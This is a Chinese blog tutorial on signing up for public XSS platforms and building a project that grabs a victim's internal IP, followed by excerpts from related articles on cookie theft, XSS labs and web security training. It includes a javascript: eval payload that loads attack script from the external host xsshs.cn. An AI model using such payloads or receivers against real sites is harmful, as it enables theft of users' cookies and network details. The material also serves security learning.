我接触使用过三个XSS平台
1.脚本非常丰富: http://www.1oad.com
2.简约: https://xsspt.com
3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功): https://xsshs.cn
所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明;

一、注册用户并登录

二、创建项目

1.创建项目,创建完后会生成一个xss可用脚本地址
在这里插入图片描述
项目名称随意,项目描述随意;但是创建之后就不能更改了。

2.有很多可用的模块,我们这次要构建一个获取计算机内网ip地址的xss脚本,所以勾选获取内网ip模块; 在这里插入图片描述

这里也选择上 在这里插入图片描述
点击下一步就创建成功一个项目,如下:
在这里插入图片描述
上图中“
xsshs.cn/JI9q” 就是本次构建攻击脚本,其中 JI9q就是id;

三、如何使用

(本次测试方法为自己本地测试----就是自己攻击自己,假设已经成功xss,然后查看xss的效果)
打开任意网站例如百度,如后输入

javascript:eval('window.s=document.createElement("script");window.s.src="//xsshs.cn/JI9q";document.body.appendChild(window.s)')
注意:其中src换成你自己的攻击脚本即可,然后回车

在这里插入图片描述
此时返回xss平台:
在这里插入图片描述
以上XSS平台 测试演示成功;

一定要多多利用平台上面各种脚本,那个才是根本,然后自己买一个VPS,不用这个平台也是可以的。

我接触使用过三个XSS平台1.脚本非常丰富:http://www.1oad.com2.简约:https://xsspt.com3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明;一、注册用户并登录二、创建项目1.创建项目,创建完后会生成一个xss可用脚本地址项目名... XSS介绍 XSS (cross site scripting)跨站脚本,较适合的方式应该叫做跨站脚本攻击,诞生于1996年,人们经常将跨站脚本攻击(cross site scripting)缩写为CSS,但这会层叠样式表(cascading style sheets,CSS )的缩写混淆,因此,有人把跨站脚本攻击缩写为XSS。 反射型(非持久型): 攻击者事先做好攻击链接,需要欺骗用户自己去点击链接才能触发漏洞。 存储型(持久型): payl..
这篇更详细,对蓝莲花的XSS有更详细的说明 https://blog.csdn.net/weixin_50464560/article/details/115360092 https://bbs.secgeeker.net/thread-1519-1-1.html 搭建xss-platform平台 一直想搭在公网搭建自己的XSS平台用来验证XSS漏洞,使用别人的平台自己心里总会有担心被摘果子的顾虑,前几天参考了不少前人...
文章目录一、窃取Cookie1.1 解释1.2 操作搭建xss平台二、 以下所有的针对XSS的利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作!!! 一、窃取Cookie 1.1 解释   恶意攻击者通过XSS攻击,窃取其他账户的Cookie信息从而进行未授权非法操作。 1.2 操作 搭建xss平台 这里我直接百度使用一个xss平台来接Cookie Tips:为了安全...
1 XSS靶场简介 XSS-labs:一款以练习测试XSS思路和命令的闯关游戏,主要是以反射型XSS漏洞为主。 DVWA:一个功能较全的靶场环境,漏洞类型齐全,包含在XSS三种类型的漏洞,各有4个级别的破解难度。 BlueLotus_XSSReceiver:该源码是由清华大学蓝莲花战队的firesun编写,安装方便,功能强大。 2 DVWA靶场搭建过程 方法一:可以参考《Docker上搭建DVWA漏洞环境》。安装简单,但安装结果功能有所欠缺。 方法二:可以参考《WAMP环境+DVWA漏洞测试平台搭建过程》。
接下来我会分享一些入门级靶场,从环境搭建一直到通关教程。 入门级靶场会分享:pikachu、DVWA、XSS-labs、sql-labs、upload-labs等内容。 上篇文章写到了 pikachu 靶场的搭建,本文写 XSS-lab 靶场环境的搭建。 一、环境准备 1 搭建环境 2 下载链接 二、安装教程 1. 首先我们需要搭建好PHP study: 2. 下载 xss-labs 靶场源码 3.解压缩并放入如下..
一、什么是打 cookie 简单来说就是:在你访问的页面上执行了一次JS代码,这次代码的执行后可以获取你当前已经登录某个网站的cookie ,并将该cookie 发送到攻击者指定的网站,攻击者利用你的cookie 登录你的账号。 攻击者用来接收cookie 的平台就叫做xss 平台,在网上其实有很多这种平台,但其实有的平台存在黑吃黑的现象(懂得都懂),而且有很多渗透测试任务都是保密的,不可能去第三方网站。 二、cookie 接收平台 这里推荐一个平台,BlueLotus_XSSReceiver
跨网站指令码(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程式的安全漏洞攻击,是代码注入的一种。它允许恶意使用者将程式码注入到网页上,其他使用者在观看网页时就会受到影响。这类攻击通常包含了HTML以及使用者端脚本语言。 XSS测试平台测试XSS漏洞获取cookie并接收Web页面的平台XSS可以做JS能做的所有事情,包括但不限于窃取cookie、后台增删文章、钓鱼、利用XSS漏洞经行传播、修改网页代码、网站重定向、获取用户信息(比如浏览器信息、IP地址)等。 二、Web安全系列之漏洞 1、漏洞产生原因(1天) 漏洞就是软件设计时存在的缺陷,安全漏洞就是软件缺陷具有安全攻击应用方面的价值。软件系统越复杂,存在漏洞的可能性越大。 2、漏洞出现哪些地方?(2天) 前端静态页面 服务:主机、网络 移动APP 3、常见漏洞(3天) SQL注入:布尔型注入、报错型注入、可联合查询注入、基于时间延迟注入。 XSS(跨站脚本攻击):反射型XSS、存储型XSS、DOM XSS CSRF(跨站请求伪造) SSRF(服务器端请求伪造) 文件上传下载:富文本编辑器 弱口令: X-Scan、Brutus、Hydra、溯雪等工具 其它漏洞: 4、逻辑漏洞(3天) 任意密码重置 支付漏洞:0元购 接口权限配置不当: 验证码功能缺陷: 5、框架漏洞(2天) struts2漏洞、Spring远程代码执行漏洞、Java反序列化漏洞 6、建站程序漏洞(1天) Discuz漏洞、CMS漏洞等 三、Web安全系列之防御 1、常见防御方案(1天) 2、安全开发(2天) 开发自检、测试自检、部署自检 开发工具:安全框架Spring security、 shiro、Spring boot 3、安全工具和设备(2天) DDos防护、WAF、主机入侵防护等等 4、网站安全工具(1天) 阿里云、云狗、云盾 网站在线检测:http://webscan.360.cn/ https://guanjia.qq.com/online_server/webindex.html http://www.51testing.com/zhuanti/selenium.html Selenium是一个用于Web应用程序测试的工具
Vega是一款开源的Web应用程序安全测试平台,可用于测试Web应用程序的安全性。以下是Vega测试工具的使用教程: 1. 下载安装Vega:您可以从Vega的官方网站(https://subgraph.com/vega/)下载最新版本的Vega,然后按照安装向导进行安装。 2. 创建一个新的扫描项目:启动Vega后,单击“File”菜单中的“New Scan”选项,然后输入要扫描的URL和扫描名称。 3. 配置扫描选项:在“Scan Configuration”对话框中,您可以选择要使用的扫描选项。例如,您可以选择自动进行XSS和SQL注入检查,或者只检查特定的漏洞类型。 4. 启动扫描:单击“Start Scan”按钮开始扫描。 Vega将开始自动扫描您的应用程序,并在扫描过程中显示进度信息和扫描结果。 5. 查看扫描结果:扫描完成后,您可以查看扫描结果并查找漏洞。在左侧的“Scan Tree”面板中,您可以查看扫描结果的摘要。右侧的“Scan Details”面板中,您可以查看详细的扫描报告。 6. 导出扫描结果:您可以将扫描结果导出到HTML或PDF格式的报告中,以便进一步分析和分享。 总之,使用Vega测试工具进行Web应用程序的安全测试非常简单,只需几个简单的步骤即可完成。但请注意,Vega是一款强大的测试工具,需要谨慎使用,以避免对您的应用程序造成不必要的损害。